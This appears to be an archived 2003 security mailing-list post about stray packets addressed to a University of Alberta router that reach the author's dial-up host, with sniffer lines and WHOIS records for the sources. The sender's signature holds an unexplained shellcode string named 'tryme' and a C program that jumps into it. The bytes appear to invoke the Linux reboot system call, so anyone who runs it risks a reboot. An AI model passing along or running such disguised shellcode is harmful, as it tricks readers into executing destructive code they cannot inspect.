Missrouted - once more - what happens?

From: Pawe³ Stochliñski <admin(at)weblog.pl>
Date: Mon Jul 07 2003 - 18:11:17 EDT

I'm writing once more because of some strange behaviours i have reported while analizing incoming connections to my host. As for introduction, i would like to explain; host is connectied directly to ISP via ppp connection, there is no localsubnet, server stands for its own, on a single modem connection (115500Kbp/sec). Today logs from sniffer look pretty famous, all of 'em have something in common - these are destination ports.
The 3 day logging, gave me an pretty huge file that was fully filled with packets that _shouldnt arrive_ on my host, as i mentioned before. They come from all over the world, starting at US, ending at JP. I won't put too much here, i just put those most important(?) i think. I will base on packets sent to alberta - of course, the database file after 3 days grew incredibly, that is why i show here a few examples:

1)
[14:38:13|6/7]55.52.0.2.1 > gsb04-0-1.gw.ualberta.ca.2 F (ttl 4,len 49320,id
5632,tos 1,ack:0)win 29702,chks: 26469

55.52.0.2 is known to be:
OrgName: DoD Network Information Center
OrgID: DNIC
Address: 7990 Science Applications Ct
Address: M/S CV 50
City: Vienna
StateProv: VA
PostalCode: 22183-7000
Country: US

Alberta is the Canadian university.
The source of the packet is known for me, but i rather not show it public.

2)
[15:22:54|6/7]204.95.0.1.1 > gsb04-0-1.gw.ualberta.ca.4 F (ttl 5,len
49320,id 1024,tos 1,ack:1)win 624,chks: 27648

204.95.0.1 appears to be:
OrgName: Sprint
OrgID: SPRN
Address: 12502 Sunrise Valley Dr.
City: Reston
StateProv: VA
PostalCode: 20196
Country: US

Another non lucky packet sent to alberta?

And so on, with other ones..

All i want to ask - is how is it possible, that those packets are catched by me , is there a possibility that somewhere the router is misconfigured and they arrive at a lonely host??

With respect.

---

/*http://ipe.ath.cx/ Pawe³ Stochliñski*/ int gg=2456829; /* gadugadu */
char tryme[] =
"\xeb\x16\x5e\x31\xc0\xb0\x58\xbb\xad\xde\xe1\xfe\xb9\x69\x19" "\x12\x28\xba\x67\x45\x23\x01\xcd\x80\xe8\xe5\xff\xff\xff"; void main(){ int *ret; ret = (int *)&ret + 2; (*ret) = (int)tryme;}

---

Attend the Black Hat Briefings & Training, July 28 - 31 in Las Vegas, the world's premier technical IT security event! 10 tracks, 15 training sessions, 1,800 delegates from 30 nations including all of the top experts, from CSO's to "underground" security specialists. See for yourself what the buzz is about! Early-bird registration ends July 3. This event will sell out. www.blackhat.com

---

Received on Tue Jul 8 12:03:46 2003